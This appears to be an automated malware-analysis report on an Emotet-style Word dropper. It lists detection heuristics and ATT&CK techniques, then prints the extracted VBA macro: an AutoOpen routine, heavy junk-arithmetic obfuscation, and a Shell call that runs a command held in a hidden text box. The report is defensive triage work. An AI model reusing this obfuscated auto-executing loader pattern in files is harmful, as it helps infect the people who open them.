MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including an autoopen macro, which is a common technique for executing malicious code upon opening. The 'OLE_VBA_SHELL' and 'SC_STR_CMD' heuristics indicate the use of the Shell() function to invoke cmd.exe, suggesting the execution of a secondary payload. The ClamAV detection 'Doc.Dropper.Emodldr-6787519-0' further supports its nature as a dropper.
Heuristics 9
-
ClamAV: Doc.Dropper.Emodldr-6787519-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Emodldr-6787519-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
iGibFcXwYPsDLmRYZ = 31275022 - qawPuFfGUlwjVi bjZmmKpzP = Array(qauMQuXZo, lrkWZWCKZ, XZHvqpAS, Interaction.Shell(hUmNOD, IujFN), jlzzBP) kYLEMauMmdLWnzIozRmizuM = ZMrMWwnWJpIJQYSHjF * Rnd(15066153 / Sin(mswwEjwzViwpLoizihpo)) / Wfd + Int(272283075 - Rnd(267108026 - Tan(89540666) * 332336670 - Cos(wYYziBtsjkhOvHmzqBitTz)) / 179893052 * Sin(299214531 / Tan(124834288) / 168073438 / Hex(338294192))) + 103023491 + CStr(94053476) - 278479631 / CLng(326927646) * 201644890 - Fix(1606189 - Hex(43160812) * 41248844 / ChrW(ZzrdCzfEzlnZCown / 231159796)) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() tGOPDAI -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/officeDocument/2006/bibliography In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8748 bytes |
SHA-256: 7f5af0c237b4ca9c1be11d347e96486645a78c5711731221c6390ccfd99be513 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
126 of 158 identifiers look randomly generated (e.g. 'wLizKcBIiwJtLOqBkXNbBPtM') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "qNQDMDBzsn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
tGOPDAI
End Sub
Attribute VB_Name = "XncJnfpP"
Function tGOPDAI()
On Error Resume Next
YjowwnkPhAufRo = LAVfmEPCrqqQin * Rnd(249688220 / Sin(wuXQhuapmvYpTn)) / Wfd + Int(23305211 - Rnd(81078469 - Tan(186856072) * 22805674 - Cos(fJbnwJdwHGWFcvww)) / 243205909 * Sin(306614404 / Tan(159332502) / 136242358 / Hex(114560741))) + 169175201 + CStr(206843626) - 292706185 / CLng(284122696) * 212018548 - Fix(172825999 - Hex(231434735) * 23530617 / ChrW(ioaZGsXGaHDzTjQpwtUrSR / 27523571))
wFdiwQiutUciiCpGZiUQQ = 131101643 - vcBjjOLUMkscAOo
kjhwodanwTwmFWNnzpwZQu = vqAaGmtmrvvrMDHciaCYWQAu * Rnd(154670009 / Sin(KTQamVpnmFnDUBEhF)) / Wfd + Int(283105036 - Rnd(65582854 - Tan(200031077) * 9736224 - Cos(qNPwNWafqFCocaVQIaCYR)) / 10639961 * Sin(268335748 / Tan(207438850) / 44695418 / Hex(11849438))) + 130443568 + CStr(268031359) - 69599164 / CLng(62259298) * 242914632 - Fix(296981286 - Hex(107539546) * 173577285 / ChrW(CKoHTNHPhAfYiLoijccS / 269729090))
jrMClUhUJYCzSFUSiLJ = 252379175 - fbdpdVbBQnHoibw
wOYavVdfYLjalVRubtFdwGc = IqWMbSUiNIBsYpbdWD * Rnd(215607133 / Sin(aKsiiARJzRwrmD)) / Wfd + Int(122190857 - Rnd(33796436 - Tan(334322246) * 114271379 - Cos(GrCNdUZVmScHua)) / 179316161 * Sin(306520079 / Tan(324272620) / 325149052 / Hex(288984605))) + 192468135 + CStr(174959689) - 5247635 / CLng(69955766) * 197842101 - Fix(315127068 - Hex(84060418) * 60697463 / ChrW(UXWiEzaJXzPKJff / 282498646))
KBRLJVHGodFjYRQLTAP = 321044899 - CvzRWzhhTvVTGlLruLBOXQVU
zlMWfMDSnctzWbXDEo = bjlwXQwbFYMrjVNvXcIsLOR * Rnd(231776465 / Sin(BqzfkjiZqwqNmpFjkwu)) / Wfd + Int(180204272 - Rnd(243595344 - Tan(62009883) * 186908092 - Cos(jAbvwiNOCXWZzwV)) / 286971639 * Sin(199683248 / Tan(121589457) / 294320737 / Hex(166461022))) + 155508388 + CStr(223250383) - 243436881 / CLng(256570256) * 16594676 - Fix(63318168 - Hex(173681398) * 101819453 / ChrW(HqrOowjEmcIibKPTjj / 267147307))
DzSQDlwPotmHzrujiLKz = 244801557 - spjqwWVTVZllTKXbLDAUQs
WwskXTQWiUovJNquLCpa = oUBAMZmKCDfWisKvKTXL * Rnd(201888251 / Sin(LaBQnLmWNovwidqj)) / Wfd + Int(75198172 - Rnd(300043030 - Tan(195185665) * 78577147 - Cos(RIZfUjwBjSOzdIazvmbX)) / 213319430 * Sin(278530180 / Tan(284067486) / 172083407 / Hex(209242197))) + 65423323 + CStr(213083745) - 32154259 / CLng(178367322) * 54599625 - Fix(197110160 - Hex(225243307) * 123311104 / ChrW(uSclSioUdWhwFVQjPHCo / 336478191))
RzzKAtaaojhzOIWKTwj = 77655445 - UshELorsWjijTAdl
Const IujFN = 0
ZtEEXSCppKURBOqLzTf = nPVFKODJkXFuiZcYqDWG * Rnd(53676802 / Sin(wGoVqAGthKIFnKXztIPt)) / Wfd + Int(35879476 - Rnd(120247831 - Tan(34959427) * 175786955 - Cos(bmSUwzYVKQOQpYCDqqvld)) / 248186022 * Sin(123821491 / Tan(5087221) / 287066726 / Hex(62016528))) + 93242214 + CStr(284535299) - 98012575 / CLng(152172811) * 215394841 - Fix(10375723 - Hex(90263662) * 256486319 / ChrW(OnZlMkkdtIiEjNqOc / 64993934))
FpTRcmjhGnkNDCJnPRFiAs = 55634558 - sJEiiYIErYhYvWwwdDi
VrBwdPYAwKdZAiojhbQUq = OccpjzzjTwEvwtqvrrhzRHnW * Rnd(197402870 / Sin(QYPjRvtYcYUniYCNrf)) / Wfd + Int(140420761 - Rnd(34077332 - Tan(237688118) * 307736731 - Cos(mjYntfHpGLNjZTkjIBaRRb)) / 27029864 * Sin(55265740 / Tan(62525598) / 309966922 / Hex(29888070))) + 106211954 + CStr(52699557) - 8583296 / CLng(163325538) * 231020953 - Fix(141754603 - Hex(231622928) * 196529565 / ChrW(sIzsUjOcVodtHwMDJdXKfQdw / 178716493))
hEmiOppkozChwiNbmURKIJo = 142213543 - sLTTcfBRdBJqranEWKM
ZifIfhIlKoQuZIpDPbiiJn = nvcLzRBNZJzwJDs * Rnd(253513706 / Sin(mUQMbfSGjVworz)) / Wfd + Int(208600063 - Rnd(244062559 - Tan(165693417) * 289097612 - Cos(DWJTIbqlZJjAWoiv)) / 271020406 * Sin(156349109 / Tan(319773763) / 78851331 / Hex(104772978))) + 64967307 + CStr(34532052) - 124154756 / CLng(318120958) * 23580339 - Fix(163358124 - Hex(227629918) * 79718492 / ChrW(NkLfjidBHkluswzVbz / 57380491))
qNcfztQqXFCHYF = 315479626 - orFESoQLaVRITbcZZKdAHfip
mcquhCllGkSnHaDHfZIwV = fOOZIzYzSsJGCZ * Rnd(286661519 / Sin(dHddtmSzUVpWkPzZQkwbjIto)) / Wfd + Int(84126167 - Rnd(44752362 - Tan(122042426) * 169359024 - Cos(AYiPhwASrItvOFnICOCs)) / 239387758 * Sin(277727557 / Tan(118762146) / 187276225 / Hex(102864787))) + 120224638 + CStr(137928963) - 90303784 / CLng(270081443) * 112791056 - Fix(257154033 - Hex(131266168) * 294693050 / ChrW(TwKGDTwGZcDjRCGjKs / 107208813))
tKGCAPbndaVZDslqzvLi = 304696424 - RpZjARHIGvDLcIqIGnrL
JHzCMwfPXCLLKpV = jzkUlwNivRITrzEFddu * Rnd(6927269 / Sin(DmtUwpFhHXYjkPZDbWLuV)) / Wfd + Int(41089818 - Rnd(312292035 - Tan(279512996) * 83493136 - Cos(YwGijuUqdNrzoIIzotj)) / 252559640 * Sin(43299496 / Tan(236206413) / 201136276 / Hex(9434150))) + 9621513 + CStr(46426773) - 232765097 / CLng(46296899) * 84499575 - Fix(322997850 - Hex(281059994) * 18590435 / ChrW(YRGaZrdMulMMbhC / 247606559))
RBHaRoUEjZLNdjWorQr = 10464422 - PCFaMwSoZZjVofpvhH
hUmNOD = qNQDMDBzsn.TextBox1.Text + CidVnAD + tEiCwQF + IXwddhO + pJIQqjKO + AiIPurfV + DqaGNFP + FvHLFO + dNCrinI + zHBlzMlA + jBDlQdpX + SDBYQCHZ
qlkrcfoVbmKzjIC = SMiJtpUVDlvdPr * Rnd(339907987 / Sin(KXGTsdSZXvwIHYEXGwjDoO)) / Wfd + Int(91589800 - Rnd(3336356 - Tan(117754147) * 100763434 - Cos(qjKFjnVnLCiIotElwtLOfj)) / 160934470 * Sin(152846659 / Tan(128164292) / 57809373 / Hex(317030761))) + 4239887 + CStr(317426502) - 64049154 / CLng(38249106) * 11794526 - Fix(194995057 - Hex(278143301) * 185527854 / ChrW(MqMVlktUXnuJjcPGGBIJLn / 250295218))
rUrCwjfwROYIjqcunDz = 209253104 - mQUuwvchSiZEmiQtq
zaZMVjaEFfslDCjENMYci = uJIGUZGzwCNNGTmzjNFER * Rnd(253295210 / Sin(KNksaqHXuHOjQE)) / Wfd + Int(99121152 - Rnd(94940117 - Tan(6576197) * 327796251 - Cos(ipXpwMSNjLXZRHH)) / 326146376 * Sin(298447680 / Tan(239400093) / 216158026 / Hex(215285022))) + 55263975 + CStr(272075840) - 201705966 / CLng(121328539) * 42332541 - Fix(288148477 - Hex(262831132) * 145672402 / ChrW(QzEHKDMmXojHcbMXizYIGVi / 132760525))
wtLFjEYwTPLSSGDuK = 143188380 - AYfORuYuPNovVjqMKBhojILJ
dZzcisKVnwaVSSVbiw = cUCGNknYDSiAOlGEmslr * Rnd(65018286 / Sin(UUHUdZcRpTzBfCa)) / Wfd + Int(128789816 - Rnd(250454550 - Tan(288463416) * 283986435 - Cos(GDJwMjMOjitETVAiwt)) / 44574017 * Sin(93872748 / Tan(316305897) / 246950236 / Hex(194077270))) + 72330768 + CStr(21024318) - 84518806 / CLng(38216564) * 28540771 - Fix(196040936 - Hex(124847294) * 45533012 / ChrW(AqARKLHuMOiGZsiKBrUslcX / 140165953))
wszdIkQbzEcUjYnlMBh = 17992405 - kKivCmwNIXTfrLSIQE
MowknhzfBSiHvAaGLici = iLCLvdViAHHkfdDOkpOwZ * Rnd(230190825 / Sin(cPiEJNFbHSsdcvZsEdA)) / Wfd + Int(5828540 - Rnd(72071321 - Tan(179796505) * 154411524 - Cos(XXrapNjLznawQYMRu)) / 210573955 * Sin(339800184 / Tan(117613211) / 257474823 / Hex(337850575))) + 178964041 + CStr(127416708) - 77489691 / CLng(321597287) * 66585151 - Fix(136228743 - Hex(165905101) * 224362286 / ChrW(ArOhlVflumhipUcb / 208330746))
iGibFcXwYPsDLmRYZ = 31275022 - qawPuFfGUlwjVi
bjZmmKpzP = Array(qauMQuXZo, lrkWZWCKZ, XZHvqpAS, Interaction.Shell(hUmNOD, IujFN), jlzzBP)
kYLEMauMmdLWnzIozRmizuM = ZMrMWwnWJpIJQYSHjF * Rnd(15066153 / Sin(mswwEjwzViwpLoizihpo)) / Wfd + Int(272283075 - Rnd(267108026 - Tan(89540666) * 332336670 - Cos(wYYziBtsjkhOvHmzqBitTz)) / 179893052 * Sin(299214531 / Tan(124834288) / 168073438 / Hex(338294192))) + 103023491 + CStr(94053476) - 278479631 / CLng(326927646) * 201644890 - Fix(1606189 - Hex(43160812) * 41248844 / ChrW(ZzrdCzfEzlnZCown / 231159796))
XAzfjEBidqmCNoB = 182636235 - sKBqVSWvhmZMarKvujF
tqFrzGzZFbPjwlMlvKFlh = TrQwrFMqCPthZIQ * Rnd(231224526 / Sin(wLizKcBIiwJtLOqBkXNbBPtM)) / Wfd + Int(98851325 - Rnd(169736716 - Tan(95004) * 262447081 - Cos(MDULOHazKIPOnIGDz)) / 283645334 * Sin(2143817 / Tan(17377676) / 210469338 / Hex(273805331))) + 248019867 + CStr(19405753) - 52097988 / CLng(306197041) * 234075767 - Fix(114252800 - Hex(141177071) * 237118744 / ChrW(cNsWuohwHQCZOwMOGmJRi / 340293542))
kWRRETXJiaYmAvmMOPusm = 195723283 - XEvjdiLSBdcHzcXdd
siJUppcGrTDnjh = DQXzSBqNWZalaBsJmultAhQ * Rnd(178375296 / Sin(DzYNnvhbMNwpYKzCUn)) / Wfd + Int(311488888 - Rnd(102561227 - Tan(26464540) * 14469917 - Cos(wKRtunqWzwiPBRz)) / 228526414 * Sin(195667212 / Tan(297665601) / 61511644 / Hex(89764349))) + 261358184 + CStr(303662075) - 127941019 / CLng(93749310) * 234175084 - Fix(250562206 - Hex(287896335) * 210929630 / ChrW(VLPAuaDWCnoWrwtuuwkVFRW / 307295251))
RErCJHvKcikOPHrwMbGVrw = 312150398 - UooHKoEpVMcVMTtfsLO
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.